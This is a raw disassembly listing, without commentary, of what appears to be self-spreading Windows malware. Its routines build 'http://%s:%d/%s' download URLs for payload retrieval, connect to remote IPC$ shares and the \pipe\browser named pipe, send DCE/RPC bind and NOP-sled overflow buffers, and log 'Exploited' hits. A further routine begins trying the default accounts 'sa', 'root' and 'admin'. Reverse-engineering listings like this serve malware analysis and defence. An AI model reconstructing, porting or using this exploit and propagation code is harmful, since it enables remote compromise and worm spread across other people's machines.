push 0 ; int
push eax ; void *
call _memset
push [ebp+2C4h+var_33C]
lea eax, [ebp+2C4h+var_234]
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+2C4h+var_234]
add esp, 1Ch
lea esi, [eax+1]
loc_41A560: ; CODE XREF: sub_41A391+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A560
sub eax, esi
mov [ebp+eax+2C4h+var_234], cl
lea eax, [ebp+2C4h+var_340]
push eax
push 1
push 0
lea eax, [ebp+2C4h+var_234]
push eax
push 80000002h
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz short loc_41A5A0
push [ebp+2C4h+var_340]
call ds:dword_41D010 ; RegCloseKey
inc [ebp+2C4h+var_33C]
cmp [ebp+2C4h+var_33C], 8
jb short loc_41A52A
loc_41A5A0: ; CODE XREF: sub_41A391+1FB�j
push [ebp+2C4h+var_340]
call ds:dword_41D010 ; RegCloseKey
loc_41A5A9: ; CODE XREF: sub_41A391+62�j
mov ecx, [ebp+2C4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 2C4h
leave
retn
sub_41A391 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5C1 proc near ; CODE XREF: sub_41A8D5+B7�p
var_518 = dword ptr -518h
var_508 = dword ptr -508h
var_504 = byte ptr -504h
var_501 = byte ptr -501h
var_390 = dword ptr -390h
var_21C = byte ptr -21Ch
var_21B = byte ptr -21Bh
Dest = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 508h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_508], eax
mov eax, ds:dword_41EF64
mov [ebp+var_C], eax
mov eax, ds:dword_41EF68
mov esi, offset dword_41EF6C
lea edi, [ebp+var_504]
mov ebx, 16Fh
movsw
push ebx ; size_t
mov [ebp+var_8], eax
lea eax, [ebp+var_501]
push 0 ; int
push eax ; void *
movsb
call _memset
mov esi, offset dword_41EF70
lea edi, [ebp+var_390]
movsw
movsb
push ebx ; size_t
xor esi, esi
lea eax, [ebp+var_390+3]
push esi ; int
push eax ; void *
call _memset
xor eax, eax
mov [ebp+var_1C], 0
lea edi, [ebp+var_1B]
stosd
stosd
stosd
stosw
stosb
mov edi, 0FFh
push edi ; size_t
lea eax, [ebp+var_21B]
push esi ; int
push eax ; void *
mov [ebp+var_21C], 0
call _memset
push edi ; size_t
lea eax, [ebp+var_11B]
push esi ; int
push eax ; void *
mov [ebp+Dest], 0
call _memset
add esp, 30h
cmp [ebp+arg_4], 0
jz short loc_41A6F1
call sub_419347
test al, al
jnz short loc_41A6D9
push dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_0 ; "http://%s:%d/%s"
lea eax, [ebp+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 1Ch
lea edx, [eax+1]
loc_41A6D0: ; CODE XREF: sub_41A5C1+114�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A6D0
jmp short loc_41A748
; ---------------------------------------------------------------------------
loc_41A6D9: ; CODE XREF: sub_41A5C1+BD�j
push 100h
lea esi, [ebp+Dest]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41A752
; ---------------------------------------------------------------------------
loc_41A6F1: ; CODE XREF: sub_41A5C1+B4�j
push dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_1 ; "http://%s:%d/%s"
lea eax, [ebp+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 1Ch
lea edx, [eax+1]
loc_41A741: ; CODE XREF: sub_41A5C1+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A741
loc_41A748: ; CODE XREF: sub_41A5C1+116�j
sub eax, edx
mov [ebp+eax+Dest], 0
loc_41A752: ; CODE XREF: sub_41A5C1+12E�j
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_504]
push eax ; void *
call sub_41432A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_41A774
loc_41A76D: ; CODE XREF: sub_41A5C1+1EB�j
xor eax, eax
jmp loc_41A8C6
; ---------------------------------------------------------------------------
loc_41A774: ; CODE XREF: sub_41A5C1+1AA�j
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
lea ebx, [ebp+var_390]
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41A7AE
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz short loc_41A76D
loc_41A7AE: ; CODE XREF: sub_41A5C1+1D1�j
mov ebx, [ebp+var_508]
push 9
pop ecx
xor eax, eax
mov edi, ebx
stosd
push 0FFh ; size_t
lea eax, [ebx+24h]
push 61h ; int
mov esi, offset dword_4245DC
mov edi, ebx
push eax ; void *
rep movsd
call _memset
mov esi, 101h
push esi ; size_t
lea eax, [ebx+123h]
push 62h ; int
push eax ; void *
call _memset
mov eax, 1010101h
lea edi, [ebx+224h]
push esi ; size_t
stosw
lea eax, [ebx+226h]
push 22h ; int
push eax ; void *
call _memset
mov eax, 1010101h
lea edi, [ebx+327h]
stosw
lea edi, [ebx+42Ah]
add esp, 24h
and [ebp+var_8], 0
mov [ebp+var_508], edi
jmp short loc_41A82D
; ---------------------------------------------------------------------------
loc_41A827: ; CODE XREF: sub_41A5C1+29B�j
mov edi, [ebp+var_508]
loc_41A82D: ; CODE XREF: sub_41A5C1+264�j
mov eax, [ebp+var_8]
add eax, 64h
push esi ; size_t
push eax ; int
lea eax, [edi-101h]
push eax ; void *
call _memset
add [ebp+var_508], 103h
add esp, 0Ch
inc [ebp+var_8]
cmp [ebp+var_8], 8
mov eax, 1010101h
stosw
jl short loc_41A827
push 9
pop ecx
mov eax, 6C6C6C6Ch
lea edi, [ebx+0B41h]
rep stosd
stosb
lea edi, [ebx+0B66h]
mov esi, offset dword_424604
movsd
movsd
lea eax, [ebp+var_390]
movsw
mov esi, ds:dword_41D0A4
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_390]
push eax
lea eax, [ebx+0B70h]
push eax
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esp, 0Ch
push 54Ah
push 6Dh ; size_t
lea eax, [ebp+var_390]
push eax ; int
call esi ; lstrlen
lea eax, [eax+ebx+0B70h]
push eax ; void *
call _memset
add esp, 0Ch
mov eax, ebx
loc_41A8C6: ; CODE XREF: sub_41A5C1+1AE�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_41A5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=12BCh
sub_41A8D5 proc near ; DATA XREF: .data:004245A8�o
var_133C = byte ptr -133Ch
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_122F = dword ptr -122Fh
var_1228 = word ptr -1228h
var_1226 = word ptr -1226h
var_1224 = dword ptr -1224h
var_1218 = byte ptr -1218h
var_1217 = byte ptr -1217h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-12BCh]
mov eax, 133Ch
call __alloca_probe
mov eax, dword_423064
xor eax, ebp
mov [ebp+12BCh+var_4], eax
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+12BCh+arg_0]
lea edi, [ebp+12BCh+var_133C]
rep movsd
mov esi, 1211h
push esi ; size_t
lea eax, [ebp+12BCh+var_1217]
push 0 ; int
push eax ; void *
mov [ebp+12BCh+var_1218], 0
call _memset
mov eax, [ebp+12BCh+var_1238]
add esp, 0Ch
push [ebp+12BCh+var_1234]
mov [ebp+12BCh+var_1228], 2
mov [ebp+12BCh+var_1224], eax
call ds:dword_41D278 ; htons
push 6
push 1
push 2
mov [ebp+12BCh+var_1226], ax
call ds:dword_41D27C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41A961
loc_41A95D: ; CODE XREF: sub_41A8D5+A8�j
xor al, al
jmp short loc_41A9C7
; ---------------------------------------------------------------------------
loc_41A961: ; CODE XREF: sub_41A8D5+86�j
push 10h
lea eax, [ebp+12BCh+var_1228]
push eax
push edi
call ds:dword_41D240 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41A97F
loc_41A976: ; CODE XREF: sub_41A8D5+C0�j
push edi
loc_41A977: ; CODE XREF: sub_41A8D5+D7�j
call ds:dword_41D224 ; closesocket
jmp short loc_41A95D
; ---------------------------------------------------------------------------
loc_41A97F: ; CODE XREF: sub_41A8D5+9F�j
push [ebp+12BCh+var_122F]
lea eax, [ebp+12BCh+var_1218]
push eax
call sub_41A5C1
test eax, eax
pop ecx
pop ecx
jz short loc_41A976
push 0
push esi
lea eax, [ebp+12BCh+var_1218]
push eax
push edi
call ds:dword_41D228 ; send
cmp eax, 0FFFFFFFFh
push edi
jz short loc_41A977
call ds:dword_41D224 ; closesocket
mov eax, [ebp+12BCh+var_123C]
imul eax, 2Ch
lea eax, dword_42454C[eax]
inc dword ptr [eax]
mov al, 1
loc_41A9C7: ; CODE XREF: sub_41A8D5+8A�j
mov ecx, [ebp+12BCh+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 12BCh
leave
retn
sub_41A8D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9DE proc near ; CODE XREF: sub_413A2D+20C�p
; sub_413A2D+31D�p ...
var_642C = dword ptr -642Ch
var_6419 = byte ptr -6419h
var_6418 = dword ptr -6418h
Memory = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
Str1 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = byte ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = byte ptr -63F0h
var_63EF = byte ptr -63EFh
var_63EE = byte ptr -63EEh
var_63ED = byte ptr -63EDh
var_63EC = byte ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63DC = word ptr -63DCh
var_63DA = word ptr -63DAh
var_63D8 = byte ptr -63D8h
var_63C8 = dword ptr -63C8h
var_63C4 = byte ptr -63C4h
var_63C0 = byte ptr -63C0h
var_63AC = dword ptr -63ACh
var_63A0 = dword ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = dword ptr -6398h
var_6394 = dword ptr -6394h
var_6390 = dword ptr -6390h
var_638C = dword ptr -638Ch
var_6388 = dword ptr -6388h
var_6384 = dword ptr -6384h
var_6380 = dword ptr -6380h
var_637C = dword ptr -637Ch
var_6378 = dword ptr -6378h
var_6374 = dword ptr -6374h
var_6370 = word ptr -6370h
var_636E = byte ptr -636Eh
var_636D = byte ptr -636Dh
var_636C = dword ptr -636Ch
var_6368 = word ptr -6368h
var_6366 = word ptr -6366h
var_6364 = dword ptr -6364h
var_6360 = word ptr -6360h
var_635E = word ptr -635Eh
var_635C = dword ptr -635Ch
var_6358 = dword ptr -6358h
var_6354 = word ptr -6354h
var_6352 = byte ptr -6352h
var_6350 = byte ptr -6350h
var_6340 = dword ptr -6340h
var_633C = byte ptr -633Ch
var_632C = dword ptr -632Ch
var_6328 = dword ptr -6328h
var_6228 = dword ptr -6228h
var_6224 = dword ptr -6224h
var_621C = byte ptr -621Ch
var_6218 = byte ptr -6218h
var_6217 = byte ptr -6217h
var_6208 = dword ptr -6208h
var_6108 = byte ptr -6108h
var_6107 = byte ptr -6107h
Dest = byte ptr -6008h
var_4008 = byte ptr -4008h
var_2008 = byte ptr -2008h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 641Ch
call __alloca_probe
mov eax, dword_423064
xor eax, esp
mov [esp+641Ch+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [esp+6428h+var_6328]
rep movsd
mov eax, [esp+6428h+var_6224]
push eax
mov [esp+642Ch+var_63F4], eax
call ds:dword_41D260 ; inet_ntoa
xor ebx, ebx
mov [esp+6428h+Str1], eax
mov [esp+6428h+var_6410], ebx
loc_41AA2A: ; CODE XREF: sub_41A9DE+722�j
cmp [esp+6428h+var_6410], 2
ja loc_41B10F
push offset a_ ; "."
push [esp+642Ch+Str1] ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_41AA9D
push [esp+6428h+Str1]
lea eax, [esp+642Ch+Dest]
push offset aSIpc ; "\\\\%s\\ipc$"
push 2000h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 8
pop ecx
xor eax, eax
push ebx
lea edi, [esp+642Ch+var_63C0]
rep stosd
lea eax, [esp+642Ch+Dest]
push offset byte_41EEEE
mov [esp+6430h+var_63AC], eax
push offset byte_41EEEF
lea eax, [esp+6434h+var_63C0]
push eax
call sub_402642
test eax, eax
jnz loc_41B10F
loc_41AA9D: ; CODE XREF: sub_41A9DE+69�j
push [esp+6428h+Str1]
lea eax, [esp+642Ch+var_4008]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push 2000h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
lea eax, [esp+6440h+var_4008]
push eax
call ds:dword_41D06C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [esp+6428h+var_6418], eax
jz loc_41B10F
push 48h ; size_t
lea eax, [esp+642Ch+var_6370]
push ebx ; int
push eax ; void *
call _memset
mov byte ptr [esp+6434h+var_6370], 5
mov byte ptr [esp+6434h+var_6370+1], bl
mov [esp+6434h+var_636E], 0Bh
mov [esp+6434h+var_636D], 3
mov [esp+6434h+var_636C], 10h
mov [esp+6434h+var_6368], 48h
mov [esp+6434h+var_6366], bx
mov [esp+6434h+var_6364], ebx
mov [esp+6434h+var_6360], 10B8h
mov [esp+6434h+var_635E], 10B8h
mov [esp+6434h+var_635C], ebx
mov [esp+6434h+var_6358], 1
mov [esp+6434h+var_6354], bx
mov [esp+6434h+var_6352], 1
mov esi, offset dword_41F02C
lea edi, [esp+6434h+var_6350]
movsd
movsd
movsd
movsd
mov [esp+6434h+var_6340], 3
mov esi, offset dword_41F040
lea edi, [esp+6434h+var_633C]
movsd
movsd
add esp, 0Ch
movsd
push 2
movsd
pop esi
push ebx
lea eax, [esp+642Ch+var_63C4]
push eax
push 48h
lea eax, [esp+6434h+var_6370]
push eax
push [esp+6438h+var_6418]
mov [esp+643Ch+var_632C], esi
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_41B105
push ebx
lea eax, [esp+642Ch+var_63F8]
push eax
push 2000h
lea eax, [esp+6434h+var_2008]
push eax
push [esp+6438h+var_6418]
call ds:dword_41D078 ; ReadFile
call ds:dword_41D108 ; GetTickCount
push eax ; Seed
call _srand
mov edx, 41414141h
mov eax, edx
lea edi, [esp+642Ch+var_6384]
stosd
stosd
stosd
stosd
pop ecx
stosd
push 7
pop ecx
mov eax, edx
lea edi, [esp+6428h+var_63A0]
rep stosd
call _rand
mov [esp+6428h+var_6384], eax
xor eax, eax
inc eax
cmp [esp+6428h+var_6410], eax
mov [esp+6428h+var_6378], eax
mov [esp+6428h+var_637C], ebx
mov [esp+6428h+var_6380], eax
mov word ptr [esp+6428h+var_6374], bx
jnz short loc_41AC5D
mov [esp+6428h+var_6394], eax
mov [esp+6428h+var_639C], eax
mov [esp+6428h+var_6390], ebx
jmp short loc_41AC7C
; ---------------------------------------------------------------------------
loc_41AC5D: ; CODE XREF: sub_41A9DE+266�j
cmp [esp+6428h+var_6410], ebx
jnz short loc_41AC83
mov [esp+6428h+var_6394], esi
mov [esp+6428h+var_639C], esi
mov [esp+6428h+var_6390], 2EBh
loc_41AC7C: ; CODE XREF: sub_41A9DE+27D�j
mov [esp+6428h+var_6398], ebx
loc_41AC83: ; CODE XREF: sub_41A9DE+283�j
call _rand
cdq
mov esi, 0FAh
mov ecx, esi
idiv ecx
inc edx
mov [esp+6428h+var_63A0], edx
call _rand
cdq
idiv esi
mov eax, [esp+6428h+var_6410]
shl eax, 4
mov edi, dword_424628[eax]
push edi ; Size
mov [esp+642Ch+var_6388], ebx
mov [esp+642Ch+var_63FC], eax
mov [esp+642Ch+var_6400], edi
inc edx
mov [esp+642Ch+var_638C], edx
call _malloc
mov esi, eax
cmp esi, ebx
pop ecx
mov [esp+6428h+Memory], esi
jz loc_41B105
lea eax, [edi-2]
push eax ; size_t
push 90h ; int
push esi ; void *
call _memset
lea edi, [esi+edi-2]
xor eax, eax
stosw
mov eax, [esp+6434h+var_63FC]
mov eax, dword_424630[eax]
lea edi, [eax+esi]
mov esi, offset dword_42461C
movsd
movsw
add eax, 7
movsb
mov [esp+6434h+var_6404], eax
xor eax, eax
mov [esp+6434h+var_6218], bl
lea edi, [esp+6434h+var_6217]
stosd
stosd
stosd
stosw
stosb
add esp, 0Ch
mov edi, 0FFh
push edi ; size_t
lea eax, [esp+642Ch+var_6107]
push ebx ; int
push eax ; void *
mov [esp+6434h+var_6108], bl
call _memset
add esp, 0Ch
push edi ; size_t
lea eax, [esp+642Ch+var_6208+1]
push ebx ; int
push eax ; void *
mov byte ptr [esp+6434h+var_6208], bl
call _memset
add esp, 0Ch
cmp [esp+6428h+var_621C+1], bl
jz loc_41ADF3
call sub_419347
test al, al
jnz short loc_41ADDA
push dword_4269BC
lea esi, [esp+642Ch+var_6218]
call sub_418FC6
lea esi, [esp+642Ch+var_6108]
mov ebx, offset byte_425061
mov [esp+642Ch+var_642C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push dword_426594
lea eax, [esp+6430h+var_6218]
push eax
push offset aHttpSDS_2 ; "http://%s:%d/%s"
lea eax, [esp+6438h+var_6208]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+6440h+var_6208]
add esp, 18h
lea ecx, [eax+1]
loc_41ADD1: ; CODE XREF: sub_41A9DE+3F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41ADD1
jmp short loc_41AE56
; ---------------------------------------------------------------------------
loc_41ADDA: ; CODE XREF: sub_41A9DE+395�j
push 100h
lea esi, [esp+642Ch+var_6208]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41AE60
; ---------------------------------------------------------------------------
loc_41ADF3: ; CODE XREF: sub_41A9DE+388�j
push dword_4269BC
lea esi, [esp+642Ch+var_6218]
call sub_418FC6
lea esi, [esp+642Ch+var_6108]
mov ebx, offset byte_425061
mov [esp+642Ch+var_642C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push dword_426594
lea eax, [esp+6430h+var_6218]
push eax
push offset aHttpSDS_3 ; "http://%s:%d/%s"
lea eax, [esp+6438h+var_6208]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+6440h+var_6208]
add esp, 18h
lea ecx, [eax+1]
loc_41AE4F: ; CODE XREF: sub_41A9DE+476�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AE4F
loc_41AE56: ; CODE XREF: sub_41A9DE+3FA�j
sub eax, ecx
mov byte ptr [esp+eax+6428h+var_6208], 0
loc_41AE60: ; CODE XREF: sub_41A9DE+413�j
lea eax, [esp+6428h+var_6208]
push eax ; int
mov esi, offset dword_433950
push esi ; void *
call sub_41432A
test eax, eax
pop ecx
pop ecx
mov [esp+6428h+var_640C], eax
jz loc_41B126
mov edi, offset dword_424614
push edi
push eax
push esi
push 1
mov ebx, offset dword_433AC8
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41AEB4
push edi
push [esp+642Ch+var_640C]
push esi
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz loc_41B126
loc_41AEB4: ; CODE XREF: sub_41A9DE+4BC�j
mov esi, [esp+6428h+Memory]
dec eax
push eax
mov eax, [esp+642Ch+var_6404]
add eax, esi
push ebx
push eax
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
mov eax, [esp+6434h+var_63FC]
mov eax, dword_42462C[eax]
add esp, 0Ch
cmp [esp+6428h+var_6410], 1
jnz short loc_41AF07
mov ecx, dword_433C68
mov [eax+esi], ecx
mov ecx, dword_424644
add eax, 0Ch
mov [eax+esi], ecx
mov ecx, dword_424644
lea eax, [eax+esi+24h]
mov [eax], ecx
mov ecx, dword_424644
mov [eax+0Ch], ecx
jmp short loc_41AF21
; ---------------------------------------------------------------------------
loc_41AF07: ; CODE XREF: sub_41A9DE+4FB�j
cmp [esp+6428h+var_6410], 0
jnz short loc_41AF21
push 10h
add eax, esi
pop ecx
loc_41AF13: ; CODE XREF: sub_41A9DE+541�j
mov edx, dword_424644
mov [eax], edx
add eax, 4
dec ecx
jnz short loc_41AF13
loc_41AF21: ; CODE XREF: sub_41A9DE+527�j
; sub_41A9DE+52E�j
mov edi, [esp+6428h+var_6400]
add edi, 42h
push edi ; Size
call _malloc
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_41B13C
push edi ; size_t
push 0 ; double
push ebx ; void *
call _memset
push 5
pop ecx
lea esi, [esp+6434h+var_6384]
mov edi, ebx
rep movsd
mov esi, [esp+6434h+var_6400]
mov eax, esi
test eax, eax
mov [esp+6434h+var_640C], eax
fild [esp+6434h+var_640C]
jge short loc_41AF68
fadd ds:flt_420D38
loc_41AF68: ; CODE XREF: sub_41A9DE+582�j
fmul ds:dbl_420D30
add esp, 4
fstp [esp+6430h+var_640C]
fld [esp+6430h+var_640C]
fstp qword ptr [esp]
call _ceil
fstp [esp+6430h+var_640C]
fld [esp+6430h+var_640C]
call __ftol2
and dword ptr [ebx+18h], 0
push esi
push [esp+6434h+Memory]
mov [ebx+1Ch], eax
mov [ebx+14h], eax
lea eax, [ebx+20h]
push eax
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esp, 14h
lea eax, [esi+20h]
jmp short loc_41AFAF
; ---------------------------------------------------------------------------
loc_41AFAE: ; CODE XREF: sub_41A9DE+5D3�j
inc eax
loc_41AFAF: ; CODE XREF: sub_41A9DE+5CE�j
test al, 3
jnz short loc_41AFAE
push 7
lea edi, [ebx+eax]
pop ecx
push [esp+6428h+Memory] ; Memory
add eax, 1Ch
lea esi, [esp+642Ch+var_63A0]
rep movsd
mov [esp+642Ch+var_6404], eax
call _free
pop ecx
push 6
xor eax, eax
pop ecx
lea edi, [esp+6428h+var_63F0]
rep stosd
mov [esp+6428h+var_63EF], al
mov [esp+6428h+var_63EE], al
lea edi, [esp+6428h+var_63D8]
stosd
xor esi, esi
stosd
stosd
push esi
push esi
stosd
push 1
push esi
mov [esp+6438h+var_63F0], 5
mov [esp+6438h+var_63ED], 3
mov dword ptr [esp+6438h+var_63EC], 10h
mov word ptr [esp+6438h+var_63E8+2], si
mov [esp+6438h+var_63E4], esi
mov [esp+6438h+var_63DC], si
mov [esp+6438h+var_63DA], 1Fh
stosd
call ds:dword_41D09C ; CreateEventA
mov [esp+6428h+var_63C8], eax
mov [esp+6428h+var_6419], 0
mov [esp+6428h+Memory], esi
loc_41B030: ; CODE XREF: sub_41A9DE+6E4�j
cmp [esp+6428h+Memory], 2
jge loc_41B0C8
inc [esp+6428h+Memory]
push 1 ; char
push 10B8h ; int
push [esp+6430h+var_6404] ; Memory
lea esi, [esp+6434h+var_63F0]
push ebx ; int
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [esp+6450h+var_6418] ; int
rep movsd
call sub_416D6C
add esp, 2Ch
test al, al
jz short loc_41B0C8
cmp [esp+6428h+var_63C8], 0
jz short loc_41B0BD
lea eax, [esp+6428h+var_63D8]
push eax
lea eax, [esp+642Ch+var_63F8]
push eax
push 2000h
lea eax, [esp+6434h+var_2008]
push eax
push [esp+6438h+var_6418]
call ds:dword_41D078 ; ReadFile
test eax, eax
jnz short loc_41B0A2
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz short loc_41B0BD
loc_41B0A2: ; CODE XREF: sub_41A9DE+6B5�j
push 3E8h
push [esp+642Ch+var_63C8]
call ds:dword_41D07C ; WaitForSingleObject
cmp eax, 102h
jnz short loc_41B0BD
mov [esp+6428h+var_6419], 1
loc_41B0BD: ; CODE XREF: sub_41A9DE+690�j
; sub_41A9DE+6C2�j ...
cmp [esp+6428h+var_6419], 0
jz loc_41B030
loc_41B0C8: ; CODE XREF: sub_41A9DE+657�j
; sub_41A9DE+689�j
push [esp+6428h+var_6418]
mov esi, ds:dword_41D0DC
call esi ; CloseHandle
push ebx ; Memory
call _free
cmp [esp+642Ch+var_63C8], 0
pop ecx
jz short loc_41B0E8
push [esp+6428h+var_63C8]
call esi ; CloseHandle
loc_41B0E8: ; CODE XREF: sub_41A9DE+702�j
cmp [esp+6428h+var_6419], 0
jnz short loc_41B149
cmp [esp+6428h+var_6410], 0
jnz short loc_41B10F
mov [esp+6428h+var_6410], 1
xor ebx, ebx
jmp loc_41AA2A
; ---------------------------------------------------------------------------
loc_41B105: ; CODE XREF: sub_41A9DE+1E5�j
; sub_41A9DE+2F7�j
push [esp+6428h+var_6418]
call ds:dword_41D0DC ; CloseHandle
loc_41B10F: ; CODE XREF: sub_41A9DE+51�j
; sub_41A9DE+B9�j ...
xor al, al
loc_41B111: ; CODE XREF: sub_41A9DE+7BD�j
mov ecx, [esp+6428h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41A9DE+49D�j
; sub_41A9DE+4D0�j
push [esp+6428h+var_6418]
call ds:dword_41D0DC ; CloseHandle
push [esp+6428h+Memory] ; Memory
loc_41B134: ; CODE XREF: sub_41A9DE+769�j
call _free
pop ecx
jmp short loc_41B10F
; ---------------------------------------------------------------------------
loc_41B13C: ; CODE XREF: sub_41A9DE+555�j
push [esp+6428h+var_6418]
call ds:dword_41D0DC ; CloseHandle
push esi
jmp short loc_41B134
; ---------------------------------------------------------------------------
loc_41B149: ; CODE XREF: sub_41A9DE+70F�j
push [esp+6428h+var_63F4]
call ds:dword_41D260 ; inet_ntoa
push eax
mov eax, [esp+642Ch+var_6228]
imul eax, 2Ch
add eax, offset dword_424528
push eax ; Args
push offset aSExploitedS_ ; "%s: Exploited: %s."
lea eax, [esp+6434h+var_6328]
push eax ; int
push dword ptr [esp+6438h+var_621C] ; char
push offset dword_4269BC ; int
call sub_417361
mov eax, [esp+6440h+var_6228]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
mov al, [esp+6428h+var_6419]
jmp loc_41B111
sub_41A9DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CD8h
sub_41B1A0 proc near ; DATA XREF: .data:0042457C�o
var_D54 = dword ptr -0D54h
var_D50 = dword ptr -0D50h
var_D4C = dword ptr -0D4Ch
var_D48 = dword ptr -0D48h
var_D44 = byte ptr -0D44h
var_D40 = dword ptr -0D40h
var_D3C = dword ptr -0D3Ch
var_D38 = dword ptr -0D38h
var_D34 = dword ptr -0D34h
var_D30 = dword ptr -0D30h
var_D2C = dword ptr -0D2Ch
var_D26 = byte ptr -0D26h
var_D25 = byte ptr -0D25h
var_D24 = dword ptr -0D24h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = byte ptr -0C18h
var_C14 = byte ptr -0C14h
var_814 = byte ptr -814h
Dest = byte ptr -414h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-0CD8h]
sub esp, 0D54h
mov eax, dword_423064
xor eax, ebp
mov [ebp+0CD8h+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+0CD8h+var_14], bl
lea esi, [ebp+0CD8h+arg_0]
lea edi, [ebp+0CD8h+var_D24]
rep movsd
lea edi, [ebp+0CD8h+var_13]
stosd
stosd
stosd
stosw
stosb
mov eax, [ebp+0CD8h+var_C20]
mov [ebp+0CD8h+var_D40], eax
lea eax, [ebp+0CD8h+var_D34]
push eax
push ebx
push 1
mov [ebp+0CD8h+var_D26], bl
mov [ebp+0CD8h+var_D54], offset aSa ; "sa"
mov [ebp+0CD8h+var_D50], offset aRoot ; "root"
mov [ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
mov [ebp+0CD8h+var_D48], ebx
mov [ebp+0CD8h+var_D25], bl
mov [ebp+0CD8h+var_D2C], ebx
mov [ebp+0CD8h+var_D30], ebx
call sub_402630
test ax, ax
jz short loc_41B23A
loc_41B220: ; CODE XREF: sub_41B1A0+AE�j
xor al, al
loc_41B222: ; CODE XREF: sub_41B1A0+CF�j
mov ecx, [ebp+0CD8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
